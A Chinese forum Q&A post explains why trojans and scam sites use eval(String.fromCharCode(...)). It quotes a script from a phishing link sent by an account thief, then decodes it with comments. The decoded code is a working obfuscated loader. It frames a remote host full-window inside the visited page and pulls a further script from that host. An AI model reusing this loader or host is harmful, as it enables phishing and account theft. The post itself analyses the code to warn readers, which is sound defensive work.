為什麼很多木馬和非法網站,裡面都有類似這段代碼
t=eval("String.fromCharCode("+t+")"
網上遇見個盜號的騙子,一直強調要我用360安全瀏覽器,輸入下面網址
http://gamebbs.swjoy.com/uc_c...
例子:
<script>
t="60,104,116,109,108,62,10,60,104,101,97,100,62,10,60,109,101,116,97,32,104,116,116,112,45,101,113,117,105,118,61,34,67,111,110,116,101,110,116,45,84,121,112,101,34,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,32,47,62,10,60,116,105,116,108,101,62,60,47,116,105,116,108,101,62,10,60,109,101,116,97,32,110,97,109,101,61,34,114,101,110,100,101,114,101,114,34,32,99,111,110,116,101,110,116,61,34,105,101,45,99,111,109,112,34,62,10,60,108,105,110,107,32,114,101,108,61,34,105,99,111,110,34,32,116,121,112,101,61,34,105,109,97,103,101,47,105,99,111,34,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,119,119,46,104,100,104,121,46,120,109,46,103,111,118,46,99,110,47,100,111,119,110,47,101,101,49,47,105,99,111,46,105,99,111,34,32,47,62,10,60,108,105,110,107,32,114,101,108,61,34,115,104,111,114,116,99,117,116,32,105,99,111,110,34,32,116,121,112,101,61,34,105,109,97,103,101,47,120,45,105,99,111,110,34,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,119,119,46,104,100,104,121,46,120,109,46,103,111,118,46,99,110,47,100,111,119,110,47,101,101,49,47,105,99,111,46,105,99,111,34,32,47,62,10,60,47,104,101,97,100,62,10,60,98,111,100,121,32,115,99,114,111,108,108,61,34,110,111,34,62,10,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,10,9,47,47,60,33,45,45,10,32,32,32,32,32,32,32,32,118,97,114,32,119,101,98,76,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,10,9,9,9,118,97,114,32,112,111,115,44,115,116,114,44,117,114,108,44,114,101,109,111,116,101,85,114,108,59,32,32,10,9,9,9,115,116,114,32,61,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,32,32,10,9,9,9,112,111,115,32,61,32,115,116,114,46,105,110,100,101,120,79,102,40,34,63,34,41,59,32,32,10,9,9,9,117,114,108,32,61,32,115,116,114,46,115,117,98,115,116,114,105,110,103,40,112,111,115,43,49,41,59,32,32,10,9,9,9,99,108,111,117,100,61,34,104,116,11
6,112,58,47,47,100,110,115,112,111,100,46,99,110,46,97,108,115,117,114,101,46,99,110,47,34,43,117,114,108,59,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,10,9,9,9,100,111,99,117,109,101,110,116,46,119,114,105,116,101,108,110,40,39,60,104,116,109,108,62,60,104,101,97,100,62,60,115,116,121,108,101,62,104,116,109,108,123,111,118,101,114,102,108,111,119,58,104,105,100,100,101,110,59,125,98,111,100,121,123,104,101,105,103,104,116,58,49,48,48,37,59,109,97,114,103,105,110,58,48,112,120,59,125,60,47,115,116,121,108,101,62,60,47,104,101,97,100,62,60,98,111,100,121,32,115,99,114,111,108,108,61,34,110,111,34,62,60,105,102,114,97,109,101,32,32,105,100,61,34,108,111,97,100,98,111,120,34,32,115,114,99,61,34,34,32,104,101,105,103,104,116,61,34,49,48,48,37,34,32,119,105,100,116,104,61,34,49,48,48,37,34,32,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62,39,41,59,10,9,9,9,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,97,100,98,111,120,34,41,46,115,114,99,61,99,108,111,117,100,59,32,10,9,9,9,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,100,110,115,112,111,100,46,99,110,46,97,108,115,117,114,101,46,99,110,47,106,115,47,97,112,105,46,112,104,112,63,99,97,108,108,98,97,99,107,61,100,111,99,117,109,101,110,116,46,116,105,116,108,101,61,38,117,61,39,43,101,115,99,97,112,101,40,99,108,111,117,100,41,43,39,34,62,60,47,115,99,39,43,39,114,105,112,116,62,39,41,10,9,9,125,59,119,101,98,76,111,97,100,40,41,59,10,9,9,47,47,45,45,62,10,60,47,115,99,114,105,112,116,62,10,60,47,98,111,100,121,62,10,60,47,104,116,109,108,62"
// Decoding step: t holds a comma-separated list of character codes. Gluing it into the text
// "String.fromCharCode(...)" and handing that to eval rebuilds the original string, so the
// markup it encodes never appears in readable form in the page source.
t=eval("String.fromCharCode("+t+")");
// The decoded string is written into the current document; the browser parses it as HTML and
// runs any <script> it contains in the context of this page.
document.write(t);</script>
那些看起來像數字的,其實是由字符串轉換出來的字符編碼,String.fromCharCode 會把它們還原成原來的字符串;如果其實質是一段危險代碼,就可能獲取你很多信息。
這段代碼展開的內容是(下面的列表省略了編碼內容中兩個 link 標籤的 href 屬性):
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<meta name="renderer" content="ie-comp">
<link rel="icon" type="image/ico" />
<link rel="shortcut icon" type="image/x-icon" />
</head>
<body scroll="no">
<script type="text/javascript">
//<!--
// webLoad: replaces the current page with a full-window iframe whose address is built from
// the query string of the URL the visitor opened, then pulls in one more script from the
// same remote host. It is defined and invoked immediately on the last line.
var webLoad=function(){
// remoteUrl is declared but never used in this function.
var pos,str,url,remoteUrl;
str = window.location.href;
// Everything after the first "?" is taken as the path to load. If the URL has no "?",
// indexOf returns -1 and substring(0) yields the entire href.
pos = str.indexOf("?");
url = str.substring(pos+1);
// cloud is assigned without var, so it is not local to this function. The host is a
// subdomain of alsure.cn; the leading "dnspod.cn." labels are only part of the host name.
cloud="http://dnspod.cn.alsure.cn/"+url;
// Writes a bare document: scrolling hidden, zero margin, and a borderless iframe sized
// 100% x 100% with an empty src.
document.writeln('<html><head><style>html{overflow:hidden;}body{height:100%;margin:0px;}</style></head><body scroll="no"><iframe id="loadbox" src="" height="100%" width="100%" frameborder="0"></iframe></body></html>');
// Points the iframe at the remote URL, so the remote page fills the window while the
// address of the hosting page is the one the visitor opened.
document.getElementById("loadbox").src=cloud;
// Loads api.php from the same host, passing callback=document.title= and the escaped remote
// URL. The closing tag is split ('</sc'+'ript>') so the HTML parser does not end the
// enclosing script element early. NOTE(review): the response presumably sets the tab title
// to match the framed page; the response itself is not shown here.
document.write('<script type="text/javascript" src="http://dnspod.cn.alsure.cn/js/api.php?callback=document.title=&u='+escape(cloud)+'"></sc'+'ript>')
};webLoad();
//-->
</script>
</body>
</html>
請多查閱文檔。
一句話:eval 方法會將傳入的字符串視為 js 代碼進行執行,而這段代碼的執行域與當前執行環境相同,這意味著精心構造的字符串可以輕鬆獲取你當前頁面上的任意 js 變量值、操控當前頁面(如果當前運行環境是瀏覽器的話)。